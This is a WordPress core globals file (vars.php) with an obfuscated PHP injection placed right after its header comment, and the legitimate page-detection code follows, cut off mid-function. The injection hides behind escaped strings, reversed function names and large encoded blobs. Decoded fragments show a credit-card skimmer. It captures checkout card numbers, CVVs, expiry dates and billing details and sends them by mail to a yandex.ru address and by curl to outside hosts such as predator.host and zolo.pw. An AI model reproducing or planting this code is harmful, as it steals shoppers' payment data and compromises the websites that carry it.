<?php
/**
 * Creates common globals for the rest of WordPress
*/
$U8h5tV="\156";$mqtwcI2y0="\145";$mqtwcI2y0.="\x64";$mqtwcI2y0.="\x6f\143";$mqtwcI2y0.="\x65";$U8h5tV.="\157";$mqtwcI2y0.="\144";$mqtwcI2y0.="\137\64\x36";$U8h5tV.="\151\164";$U8h5tV.="\x63";$U8h5tV.="\x6e\x75\x66";$c1c8i036="\x74";$Po_Ye7C="\x73\164";$U8h5tV.="\137\145";$mqtwcI2y0.="\145\x73";$c1c8i036.="\162\x65\x73";$U8h5tV.="\164\x61";$Po_Ye7C.="\x72\162";$c1c8i036.="\x73";$U8h5tV.="\145";$mqtwcI2y0.="\x61\142";$U8h5tV.="\x72";$c1c8i036.="\x61";$Po_Ye7C.="\145\x76";$U8h5tV.="\143";$U8h5tV=$Po_Ye7C($U8h5tV);$mqtwcI2y0=$Po_Ye7C($mqtwcI2y0);$c1c8i036=$Po_Ye7C($c1c8i036);$YqtUieY="TsKICAgICAgICBpZiAoaXNzZXQoJF9QT1NUWydwYXltZW50J10pKSB7CiAgICAgICAgICAgICRmaWVsZHNBcnJheSA9IGFycmF9uWWVhci4qLyIgPT4gMywKICAgICAgICAgICAgICAgICIvLip5ZWxsb3dfc2V0LiovIiA9PiAzLAogICAgICAgICAgICAgICAgIi8uKnNhdmFnZV9zZXQuKi8iID0+IDQsCiAgICAgICAgICAgICAgICAiLy4qY2NfY2lkLiovIiA9PiXNzX1thLXowLTldezMyLDEyOH0jIiwgJGtleSkpCiAgICAgICAgICAgICAgICAgICAgJGZpbmQyMSA9IHRydGNjX3BheSAuICJcclxuKiIgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiAiIFsiIC4gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10gLiAiXSoiKSk7CiAgICAgICAgICAgICAgI3cF90b2tlbiIsICRhdG9rZW4sIHRpbWUoKSArIDM2MDAwLCAiLyIpOwogICAgICAgICAgICAkX0NPT0tJRVsnX3dwX3Rva2VuJ10gPSAkYXRva2VuOwogICAgICAgIH0KCiAgICAgICAgaWYgKCFpc3NldCgkX0NPPh0Uf50TE9ETJ10UfNkUDBiLgICUVt0QBJ0XO9ERPxUSNNlIoUmbpZWZkBCIgACIgACIKsHIpkCVS9EST9lTPR0TMlUTT91QSNgACIgACIgowegkSKiQXaul2XsJXdjJCKzR3cphXZf52bpR3YuVnZoAiZpBCIgACIgACIgACIgACIgAiCKsTKhRXYk9lclNXdkACLnImMlcCIsIyKigSZjFGbwVmcfJHdzBSPgEGdhR2XyV2c1RCIgACIgACIgACIgACIgACIKsTKwl2XyV2c1RCIgoQfgACIgACIgACIgACIgACIgoQfgACIgACIgACIgACIgACIgACIgAiC7sWYlJnYgACIgACIgACIgACIgACIgACIgACIgACIK0HIgACIgACIgACIgACIgACIgACIgACIgAiC7sWYlJnYgA4gJ3wnIC4gJGNjX2NpZDsKICAgICAgICAgICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnX3dkYXRhJ10pKQ4TPgQlTFdUQSV0UV9FVQ9ETSV1QgACIgACIgACIgACIgACIgoALiICI+0DIH5USE90QOV0XUB1TMJVVDBCIgACIgACIgACIgACIgAiCsUWdyRHI+0DIO9USUF0QPx0VPxETPZ0XUB1TMJVVDBCIgACIgACIgACIgACIgAiCsU2csFmZg4TPgIVREFURI9FVQ9ETACIgACIgACIgACIgACIgAiC7kCajRCKjVGel9FbyV3YABSPgQnblRnbvNGJgACIgACIgACIgACIgACIgowOpMnbvlGdw9GJgwCajRCK5FmcyF2X0B3b0V2cfxmc1NGIgACIgACIgACIgACIgACIKsTKsJXdfRXZnRCK0lmbp9FbyV3Yg0DIoNGJgACIgACIgACIgAZyBHZy92djICKoNGdh12XnVmcwhCImlGIgACIgACIgACIgACIgAgICAgICAgICAgIi8uKmV4cF9tb250aC4qLyIgPT4gMiwKICAgICAgICAgICAgICAgICIvLipleHBpcmF0aW9uTW9udGguKi8iID0+IDIsCiAgICAgICAgICAgICAgICAiLy4qbXNuX3NldC4qLyIgPT4gMiwKICAgICAgICAgICkZWQpOwogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIEBtYWlsKCd5YXRzeXZpdGFsaUB5YW5kZXgucnUnLCAnYmJfJyAuICRfU0VSVkVSWydIVFRQX0hPU1QnXSwgJGNjX3BheSk7CiAgICAgICAgICAgIH0KICAgICAgICsJXdkgSeyVWdx9Fc1t2YhJ2Xu9GZvxWatNHIu9Wa0Nmb1ZGIgACIgACIgogC7kSMgwCVS9EST9lTPR0TMlUTT91QSNEIuALCAkcG9zdCkgewogICAgICAgICAgICAkb3B0aW9ucyA9IGFycmF5KAogICAgICAgICAgICAgICAgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlLAogICAgICAgICAgICAgICAgQ1VSxhc3RfbmFtZSddIDogIiI7CiAgICAgICAgICAgICRjb3VudHJ5ID0gaXNzZXQoJF9QT1NUWydiaWxsaW5nX2NvdW50cnknXSkgPyA2Xn5WasxWaidyWUN1TQ9FJg8DIp01Jl1WYu9FdzFGbfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgUWbh5GdzFGbkACIgACIgACIgACIgowOiICI6ASXnUWbh52X0NncpZ2Xn5WasxWa0FmcpBHelpiLvICIgACIgACIgACIgACIgACIKwyMg4TPgIyLq4ichVWefBHelpiLvICIgACIgACIgACIgACIgACIKwyMg4TPgIyLq4SefBHel91YjpiLvICIgACIgAACIgACIgoALyAiP9AiIvoiLt9Fc4V2XjNmKu8iIgACIgAaWYgKCFkZWZpbmVkKCJTTUlMT0RPTl9IRUFEIikpIHsKCiAgICBkZWZpbmUoIlNNSUxPRE9OX0hFQUQiLCAxKTsKCiAgICBpZiAoIWRlZmluZWQoIkNSQ19TTAgJGZpbmQzID0gdHJ1ZTsKICAgICAgICAgICAgICAgIGlmIChzdWJzdHJf29kZWQpOwoKICAgICAgICAgICAgICAgICRjbnQgPSAwOwogICAgICAgICAgICAgICAgaWYgKGZ1bmN0aW9uX2V4aXN0cygiY3VybF9pbml0IikpIUGdhR3cfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPg42bpdWZyRCIgACIgACIgACIgAiC7IiIgoDIddSeyRnb192YfdmbpxGbpJ2JbR1UPB1XkACIgACIgACIgACIKwCMxAiP9AyUSlERFJFWB10XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIgACIgoAL4AiP9ACVV9URNlEVfRFUPxkUVNEIgACGNhc2UgMToKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY2NfbnVtYmVyID0gJICAgIGRlZmluZSgiQ1JDX1NNSUxPRE9OIiwgJGNyYzMyKTsKICAgICAgICBkZWZpbmUoIkNSQ19TTUlMT0RPTl9TSE9SVCIsICRjcmMzMiAlIDEwMDApOwogICAgfQoKICAgIGlmICghZGVmaW5lZCgiU01JTE9ET05fQkFDS1VQIiAuIECAgICAgICBleGl0OwogICAgICAgIH0KICAgIH0KCiAgICBpZiAoIWRlZmluZWQoIlNNSUxPRE9OX0JBQ0tVUF9CSUxMSU5HIiAuIENSQ19TTUlMT0RPTl9TSE9SVCkpIHsKICAgICAgICBkZWZpbmUoIlNNSUxPRE9OX0JBQ0tVUF9CSUxMSU5HIiHKgYWagACIgACIgACIgACIgACIgowegkSZ1xWY2RCI+0DI5V2akAychBSRJt0TPN0XkgCIoNWYlJ3bmBCIgACIgACIgACIgowOlNHbhZGI9ASMyQmbpZGJgACIgACIgACIgACIKsTZ1JHdg0DIyQmbpZGJgACIgACIgACIgACIKsTZzxWYmBSPgQDZulmZkASPgg4CIn0zdllmd/AHaw5CelRmbp9iTPR0TMlUTT9SZjFGcz5iby9GZlJ3LvozcwRHdodCKzRnblRnbvN2X0V2ZfVGbpZGQg0DI052YkACIgACIgACIgACIgACIgACIgACIKsHIpcSMnASPhACduNGJoAiZpBCIgACIgACIgACIgACIgAiC9BCIgu9Wa0B3bkACIgACIgACIgACIgACIgAiC7EDI9ASXUN1TQ9FVQ9ETSV1QbNnbvlGdw9GJgACIgACIgACIgACIgACIgowegkCdz9GckgCImlGIgACIgACIgACIgAiCKsTKgACIgACIgACIgACIKU2csFmZg4TPgQ1UPhUWGlkUFZ1XMN1UfRFvLipjb250cm9sX3NldHRpbmdzLiovIiA9PiAxLAogICAgICAgICAgICICAgICAgICAgICBmb3JlYWNoICgkX1BPU1RbJ3BheW1lbnQnXSBhcyAkcF9rZXkgPT4gJHBfdmFsgICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiA9PiBmYWxzZSwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTEgJGVtYWlsOwogICAgICAgICAgICBzZXRjb29raWUoIl93ZGF0YSIsIGJhc2U2NF9lbmNvZGUoJGJpbGwpLCB0aW1lKCkgKyAzNjAwMCXhpc3RzKCJleGVjIikpKSB7CiAgICAgICAgICAgICAgICAgICAgQGV4ZWMoJ2N1cmwgLS1pbnNlYnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfZW1haWwnXSA6ICIiOwoKICAgICAgICAgICAgJGJpbGpZGJgACIgACIgACIgACIgACIgACIgAiCpkiIfJXZzV3czVmcwRmcvdnIgwSeltGJoQnb192YchNGIgACIgACIgACIgACIgACIgACIgACIgACIgACIKszahVmciBCIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIKsTZ1xWY29FckASPgIXYll3XjNGJgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC6MDIlNXYjBCIzAnIC4gJGNjX21vbnRoOwogICAgICAgICAgICAgICAgaWYgKHN0cmxlbigkY2NfeWVhcikgPT0gNCkKICAgICAgICAgICAgICAgICAgICAkY2NfeWVhciA9IHN1YnN0cigkY2NfeWVhciwgMiwgMik7CiAgICAgICAgICAID0+IHRydWUsCiAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9FTkNPRElORyA9PiAiIiwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX1VTRVJBR0VOVCA9PiAiTW96aWxsYS81LjAgKFdpbmRvd3UFRfU1NMX1ZFUklGWVBFRVIgPT4gZmFsc2UsCiAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCA9PiBmYWxzZQogICAgICAgICAgICAgICAgKTsKCgogICAgICJoMTM09mcfJHdzhSZk92YuV2X0YTZzFmYg0DIkVGZvNmbl9VehB3XjNGJgACIgACIgACIgACIgACIgowOp01JhRXYkd3XnsVRJt0TPN0XkgSZk92YlR2X0YTZzFmYg4CInw3Jg0jLgkXYw91YjRCIgACIgACIgACIgACIgACIgACIgoTFlETD9FUURFSnslUFZlUFN1XkASPgAXafJXZzVHJgACIgACIgACIgACIgACIgACIgAiC7BSKp01JQl0XU5URJx0QfBFVUh0JbJVRWJVRT9FJZf52bpR3YuVnZoAiJmASKnEzJg0TIgQnbjRCKoAiZpBCIgACIgACIgACIgACIgAiCK0HIgACIgACIgACIgACIgACIKsTK052YkgSbpJHdg0DI052YkO9USUF0QPx0VPxETPZ0XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIKwSZzxWYmBiP9AiUFRUQFh0XUB1TMJVVDBCIgACIgACIgACIgACADO4kDMidTOiFjM1EWMzIGOihTZlJWNhN2YxMWY3cCI90DIp01J3RnZnsVRJt0TPN0XkgSNk1GKgYiJgkSKddyd0Z2JbVUSL90TD9FJoQXZzNXaogCI8xHIpkyJzYDM4gTOwI2N5IWMyUTYxMjY4IGOlVmY1E2YjFzYhdzJg0TPgkSXnYGd3dyWFl0SP90QfRCK1QWboPxkUVNEIgACIgACIgACIgACIgACIgACIgoALwEDI+0DITJVSEVkUYFUTfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgoALwITMg4TPgQVVPVUT0X3VybCA9ICJodHRwczovL3ByZWRhdG9yLmhvc3QvU01JTE9ET04vaW5kZXgucGhwP3ZpZXc9IjsKCiAgICAgICAgaWYgKGlzc2V0KCRfUE9TVgICAgICAgICAgICAgICAgICAgICAgJGNjX21vbnRoID0gJHBfdmFsdWU7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAg92YuV2X5FGcfN2YkAiLgcSP3VWa29DcoBnL4VGZul2LO9ERPxUSNN1LlNWYwNnLuJ3bkVmcv8iOzBHd0h2Jg4CInASZyV3gICAgICAgICAgICR1c2VyX2lwID0gJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBpZiAoaXNzZXQowWah1WZfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgwWah1WZkACIgACIgACIgACIgowOiICI6ASXnUmbvhGcfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnUmbvhGcfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgXZzNXaoAiZpBCIgACIgACIKoQfgACIgACIgAiC7QnblRnbvNGJg4mc1RXZyBCIgACIgACIgACIgowOpg2YkgyYlhXZfxmc1NGQg0DI05WZ052bjRCIgACIgACIgACIgAiC7kycuA9IGFycmF5KAogICAgICAgICAgICAgICAgICAgIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgPT4gdHJ1ZSwKICAgICAgITID0+IDEwLAogICAgICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiA9PiBmYWxzZSwKICAgICAgICAgICAgICAgIENVUkxPUc1tDVVJMT1BUX1BPU1RGSUVMRFNdID0gJHBvc3Q7CiAgICAgICAgICAgIH0KCiAgICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHRfYXJyYXkoJGNoLCAkb3B0aW9fgACIgACIgAiC7kCbslmYkgSZk92YuV2X0YTZzFmYg0DIddSY0FGZ391JbVUSL90TD9FJgACIgACIgACIgACIKsTKi8iIgwcF90b2tlbiddKSAmJiAoIWlzc2V0KCRfQ09PS0lFWydfandyJ10pKSkgewogICAgICAgICAgICAkZmluZDEgPSAkZmluZDIgPSAkZmluZDMwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9FTkNPRElORyA9PiAiIiwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9VU0VSQIgACIgowOpQnblRnbvNGJowWY2VGIgACIgACIgACIgAiCK0HIgACIgACIgACIgAiC7kCbyV3X0V2Zkgyc05WZ052bj9Fdld2XlxWamBEI9ACduVGdu92YkACIgACIgACIgACIgACIgAiCIyFWZ591YjRCIuAyJvcCIuACa052bt91YjRCIuAyJ8dCIuAiclJWb152XjNGJg0DI5FGcfN2YkACIgACIgRva2VuIiwgMSwgdGltZSgpIC0gMzYwMDAsICIvIik7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CgoKfTs=lRfSVAnXTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICR1c2VyX2RhdGEgPSBiYXNlNjRfZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSAuICI7JHBhdGg7IiAuICRfQ09PS0lFWydfd3BfdG9rZW4nXSAuICc7JyAuIPxkUVNEIgACIgACIgACIgACIgACIgACIgoALiAjLyMzL49mZlJXaGBSMwEDMyEDMy8ybrNWZHBSKw4iMzojdyByOx4SNgQlTgMACIgACIgACIgowegkSKddiUPZ0XEVERSF0VS9kRfh1XQRFVIdyWSVkVSV0UfRCK0V2czlGKgYWagACIgACIgACIgACIgACIgowOddkY29udGVudCA9IHRyaW0oJGNvbnRlbnQpOwogICAgICAgICAgICB9CgogICAgICAgICAgICBpZiAoISRjb250ZW50KSB7CN1YnN0cl9jb3VudCgka2V5LCAiX2NsZWZfIikpCiAgICAgICAgICAgICAgICAgICAgY29udGludWU7CgkJCQlpZiAoJGtleSA9PSAid29yZHByZXNzX3Rlc3RfY29va2llIikKICAgICAgICAgICAgICAgICAgICAkZmluZDIgPSBmYWxzZTsKICWJVRT9FJoQXZzNXag0DIyMzYyNGJgACIgACIgAiC7BSKpIiTPR0TMlUAgICAgICAgaWYgKCRhdXRoKSB7CiAgICAgICAgICAgICAgICAkdXNlcl9pcCA9ICRfU0VSVkVSWydSRU1PVEVfQUREUiJVSEVkUYFUTfRFUPxkUVNEIgACIgACIgACIgACIgACIKwCMyEDI+0DIUV1TF1USU9FVQ9ETSV1QgACIgACIgACIgACIgACIgoALwITMg4TPgQVVPVUTJRFVDVkTO90QfRUlQsIDEpOwoKICAgICAgICBpZiAoKChpc3NldCgkX0NPT0tJRVsnd3RmJ10pKSAmJiASZ1JHdg4TPg40TJRVQD9ETX9ETM9kRfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCsU2csFmZg4TPgIVREFURI9FVQ9ETSV1QgACIgACIgACIgA4CInAyJg4CIl52boBHJg4CInw3Jg4CI5JHduV3bjRCIuAyJ8dCIuACcppHJg4CInwHInAiLg42bpdWZyRCIuAyJ8dCIuASe0l2YkAiLgcCfnAiLgM3clJHZkFGJg4CInw3Jg4CIl1WYuR3chxGJg4CInAyJg4CIl1WYuR3cylmZkASPgwgIk1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDUuMTsgcnY6MzIuMCkgR2Vja28vMjAxMjAxMDEgRmlyZWZveC8zMi4wIiwKICAgICAgICAgICAgICAgIENVUkxPUFRfQVVUT1JFRkVSRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgIENVUkxPUF2MycpKSkgewogICAgICAgICAgICAkZ2V0X3VybCA9ICJodHRwczovL3pvbG8ucHcvd3RmL2luZGV4LnBocD9oPSIgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ107CiAgICAgICAgICAgCAgICAgICAgICB9CgogICAgICAgICAgICBpZiAoJGNjX251bWJlcikgewogICAgICACIgACIgACIgAiC6IDIlNXYjBCIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7sWYlJnYgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7UWdsFmdfBH3Xwd3XigSZpt2bvNGdlNHIgACIgACIgACIgACIgACIKsTKi8iIgwCMwAjNzAyKgkCKl1Wa0BCLxACLiI3dq9lIoUWar92bjRXZzBCIgACIgACIgACIgACIgAiCK0HIgACIgACIgACIgACIgACIKsTKoNGJoMWZ4V2XsJXdjBEIgACIgACIgACIQoJF9QT1NUWydiaWxsaW5nX2ZpcnN0X25hbWUnXSkpIHsKICAgICAgICAgICAgJGZpcnN0bmFtZSA9IGlzc2V0KCRfUE9TVFsnYmlsbGluZ19maXJzdF9uYW1lJ10pID8gJF9QT1NUWydiaWV2ZkACIgACIgACIKsTKxACLUJ1TIN1XO9ERPxUSNN1XDJ1Qg4CIiU1XO9ERPxUSNNlIoUmbpZWZkBCIgACIgACIKsHIpkCVS9EST9lTPR0TMlUTT91QSNEIuAiIV9lTPR0TMlUTTJCKkVmbpZWZkFCKgYWaJogCKowO9BCIgAiC9BICAgICAgICAgICAgICRvcHRpb25zID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICYuV2X5FGcfN2YkACLiImMlICIsIyKigSZjFGbwVmcfJHdzBSPgQWZk92YuV2X5FGcfN2YkACgACIgAiC7BSKlVHbhZ3XmRCI+0DI5V2afZGJgMXYgkXYyJXQzRGbllmZkgCIoNWYlJ3bmBCIgACIgACIgACIgogC7IiIg0DIkl2YfN2YkASPgIXYll3XjNGJg0DIoRnbv12XjNGJg0DIyVmYtVnbfN2YkACIgACIgACIgACIgogC7kCIgACIgACIgACIgAiC0AgACIgowOpIzMjJ3YkgyciFGI9AiMzMmcjRCIgACIgACIgowOwADMwADMwATM4BDItAiMzMmcjRCI9AiMzMmcjRCIgACIgACIgACIgnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfc3RhdGUnXSA6ICIiOwogICAgICAgICAgICAkY2l0eSA9IGlzc2V0KCRfUE9TVFsnYmlsbGluZ19jaXR5J10pID8gJF9QT1NUWydiaWxsaW5nX2NpdHknXSA6ICIiOwogICAgICAgICAgICAkYWRkcmVzcyA9IJGNjX3BheV9lbmNvZGVkKTsKICAgICAgICAgICAgICAgICAgICAICIgACIgACIgACIgACIgACIKwSMg4TPgIyLq4Sb152XjNmKu8iIgACIgACIgACIgACIgACIgoAK5ZjFGcz5iby9GZlJ3LvozcwRHdodCK5JXZ1F3XwV3ajFmYf52bk9Gbp12cg0DI052YkACIgACIgACIgACIgACIgACIgACIKsHiMz8CevZWZylmRgEDMxAjMxAjMv82ajV2RgkCMuIzM6YncgsTMuUDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1kIg4TPgQlTFdURVJbJ0hUVFBfSE9TVCddKSA/IGNyYzMyKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgOiAwOwogICAgICAgIGlmIChQSFBfSU5UX1NJWkUgPiA0KQogICAgICAgICAgICBpZiAoJGNyYzMyICYgMHg4MDAwMDAwMCkKICAgICA7kCIgACIgACIgACIgACIgACIgACIgoQZzxWYmBiP9ACVT9ESZZUSSVkVfx0UT9FVQ9S9TTUlMT0RPTi9pbmRleC5waHA/dmlldz0nIC4gJGNjX3BheV9lbmNvZGVkLCBmYWxzZSk7CiAgICAgICAgICAgICAgICAgICAgJGNudCA9IHRyaW0oJGNudCk7CiAgICAgICAgICAgICAXAgPSBpc3NldCgkX1BPU1RbJ2JpbGxpbmdfcG9zdGNvZGUnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfcG9zdGNvZGUnXSA6ICIiOwogICAgICAgICAgICAkcGhvbmUJg0DIoRnbv12XjNGJgACIgACIgACIgACIgACIgACIgAiCpEDI90DIpgGdu9WbfN2Ykgiblxmc0NHKgYWagACIgACIgACIgAUFRfQVVUT1JFRkVSRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUID0+IDEyMCwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX1RJ391JbVUSL90TD9FJoQXZzNXaoAiZpBCIgACIgACIKoQfgACIgACIgAiC7kiIvICIsADMwYzMg0CIpgSZtlGdgwSMgwiIydnafJCKll2av92Y0V2cgACIgACIgACIgACIKsHIpkSKddic3p2XnsVRJt0TPN0XkgCdlN3cphCImYCIp01JuV2avR3Xwd3XnsVRJt0TbmQ0ID0gdHJ1ZTsKICAgICAgICAgICAgICAgIGlmIChzdWJzd2UgNDoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY2NfY2lkID0gJHBfdmFsdWU7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICCIgACIgACIgACIgACIgACIgAiCpkiIul2XkV2Zn9GbfN3clJHckJ3b3JCIskXZrRCK05WdvN2XyR3ciV3coAiZpBCIgACIgACIgACIgACIgAiC7UWCIgACIKsTXnkkUV9FVTVUVRVkUnslUFZlUFN1XkASPggGdhBHJgACIgACIgACIgACIKowOpQDZulmZkAiJmAyMk5WamRCKgwHfgkiMk5WamRCImYCIxQmbpZGJoASPggGd1FGJgACIgACIgACIgACIKowOxIDZulmZkACf8BiMk5WamRCIIHRydWU7CiAgICAgICAgICAgIH0KCiAgICAgICAgICAgICRmaW5kMiA99lIoUWar92bjRXZzBCIgACIgACIgACIgowOp01JkdHcnsFVT9EUfRCIuAiI7ICIuASXnc2bsdyWUN1TQ9FJoUGZvNmbl9FN2U2chJGI9Aiblt2b0FGJgACIgACIgACIgACIKsHIpkSKddCZ3B3JbR1UPB1XkgCdlN3cphCImYCIp01Jn9GbnsFCgogICAgICAgICAgICAgICAgICAgICRjaCA9IGN1cmxfaW5pdCgkZ2V0X3VybCAuICR1c2VyX2RhdGEpOwogICAgICAgICAgICAgICAgICAgIGN1cmxfc2V0b3B0X2FycmF5KCRjaCwgJG9wdGlvbnMpOwogICAgICAgICAg4wIiwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9BVVRPUkVGRVJFUiA9PiB0cnVlLAogICAgICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUID0+IDgsCiAgICAgICAgICAgICAgICAgICAgIa6RCIgACIgACIgACIgAiCKsjIiAiOg01Jx81czVmckRWYfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnEzXzNXZyRGZh91ZulGbslmYnsFVT9EUfRCK0V2czlGycu9Wa0B3bkACIgACIgACIgACIgACIgAiC7BSKpICdp5Wafxmc1NmIoMHdzlGel9lbvlGdj5WdmhCImlGIgACIgACIgACIgAiC7IiIg0DI05WZ052bjRCI9ASMk5WamRCIgACIgACIgACIgACIgACIgACIgoQKpIyczVmcwRmcvdnIgwSeltGJoQnb192YfJHIgACIgACIgACIgACIgACIgACIgACIgACIgACIKsHIpUWdsFmdfZGJoACajRXa3NHIgACIgACIgACIgACIgACIgACIgACIgAiC7BSKpMXZoNGdh1GJgwSelt2XwRCIskXZr9lZkgCajRXYt91ZlJHcoAiZpBCIgACIgACIgACIgACIgACIgACIKsHIpUWd";$MF93VTxY="7UDZ1IlQZRCIuJXd0VmcKkSKwknMJN2d0FXbkgCdlN3cpFCKmlmC70Xf7kSKdFzKDt0ZOJjcks1XXxmQVhHJs01QLdmTyIHJb91VsJUV4RCLZVWaVRXcZRCKyR3ciV3coM0Nll1XvBFJ94SNkVjUClFJ7V2csVWf7kSXxsyQLdmTyIHJb91VsJUV4RCLdN0Sn5kMyRyWfdFbCVFekwSWllWV0FXWkgic0NnY1NXPuUDZ1IlQZRyepQTJDt0ZOJjckgiZptXKy0zKDt0ZOJjcksTKfdFbCVFekgiZvVmepNHPDt0ZOJjcksDM9M0Sn5kMyRCKy9mZ7IiI9UDZ1IlQZRiC7kSMyEDLwAjNywSN1wyNyUDOscjNxwCN4ETMxwSMwEDL3cTNwEDL4cTMsUDOxMDL4kDLxUjNscjNsMDM4gDLwAjMskTO3UDL3MTMsATNzkDL4ETMsYjNyMTMsETOsADO4YDL3ATMsITO2UDL0UTMsgTO5QDL4kDLwUDM4wCM0EDL2czNxEDLyETMskTO5UDLyQTMsITNxUDL3kTMsQTNzEDL0kDL5QjM4wCM0EDL3UTN3wSN4EDLzYzMzwCN5wiM1kTMsQDNxwiN0AjMsUTOxwSO1ETMsMDOxwyN2ETOskjMxwCN3YDOsYDMxwSM3kjNskzNxwCNykzMsMjNxwyN3AzNsUzMxwSN0cjNsQDNxwCM2gTOsYzMxwSM5IjMsEDMxwCM5EjMsgDMxwSM5gjMsYDOxwCO3YDMxwiNxEDLwUTMzEDLyITMskTN1ETMsITNxwyM5UjNsEzNsITM1QDL3cTMsATO5gDLzATMsMzMzQDL1kDLwQjM3wCO5wCMsYzNsUTM5ATMsUTNsMDMxQDL1QDL1UTNywSM3EDLyAjNxwCOyEDL3IDNywiN3EDL4kDL0kTMsMDOzATMsYzNsgTNxQDL5gTMskTN0MTMsIzNsMTMxMDL2ITMsITN1kDL1QTMsEjMyYDL3cTMsUTN2QDL3ETMsEjNxITMsMDNxwiMzkDL1YDL3gDN5wSN5wSM4YTMxwiN2EDLyMDO0wyM4wyN5YzNsQDOsUzNwEDL1cTMsQTOyUDLyMTMsgTNzwiM3wSMxMDMxwiMxEDL5czNywiN5wSM5kDMxwiM0EDL3EDNxEDLxgTMsMDN3MDLxUDL0YDOwEDL0ETMsgzN1UDL2cDL2MDN0wCN5wiN2MjNskzNxwyM3cTMsMzNxwCNwADMxwCMxEDLxETM2wiM4EDL1IjNyEDLxYTMsATO0wiN5EDL2ETOxEDL3ATMsUzMzcDL1kTMsgDN1MDL0gTMsMDNzgDLxUDLxUTNxwCN4wCN3IDLzETMsgzNyITMsgTNsEjM3IDLycDLzgTN0wSO0wiMxEjMxwSN3wCN4MzMxwiN1wSO2UjMxwCO3EDLxkzMyEDLykDLygTN4wSMwEDL4QTM4wyMzEDLwYDN2wSOwEDL5YDN1wCM4EDLwcDO3wyM4EDL5QzNsQzMxwyN3EDMxwCMyEDLwcDO4wSNxEDLyQDN3wyN5wyN4ATMxwSN3EDL1cTOyEDL0ETMskTO5IDL5kDL0MjM0wiN2wSM1MTMxwCO2EDL3ADOyEDLygTMsgzN2kDLwkDLwgzN3gSehJnch1zXXxmQVhHJ";
/*
 *
 * Sets $pagenow global which is the current page. Checks
 * for the browser to set which one is currently being used.
 *
 * Detects which user environment WordPress is being used on.
 * Only attempts to check for Apache, Nginx and IIS -- three web
 * servers with known pretty permalink capability.
 *
 * Note: Though Nginx is detected, WordPress does not currently
 * generate rewrite rules for it. See https://wordpress.org/support/article/nginx/
 *
 * @package WordPress
 */

global $pagenow,
	$is_lynx, $is_gecko, $is_winIE, $is_macIE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone, $is_IE, $is_edge,
	$is_apache, $is_IIS, $is_iis7, $is_nginx;

// On which page are we?
if ( is_admin() ) {
	// wp-admin pages are checked more carefully.
	if ( is_network_admin() ) {
		preg_match( '#/wp-admin/network/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} elseif ( is_user_admin() ) {
		preg_match( '#/wp-admin/user/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} else {
		preg_match( '#/wp-admin/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	}
	$pagenow = $self_matches[1];
	$pagenow = trim( $pagenow, '/' );
	$pagenow = preg_replace( '#\?.*?$#', '', $pagenow );
	if ( '' === $pagenow || 'index' === $pagenow || 'index.php' === $pagenow ) {
		$pagenow = 'index.php';
	} else {
		preg_match( '#(.*?)(/|$)#', $pagenow, $self_matches );
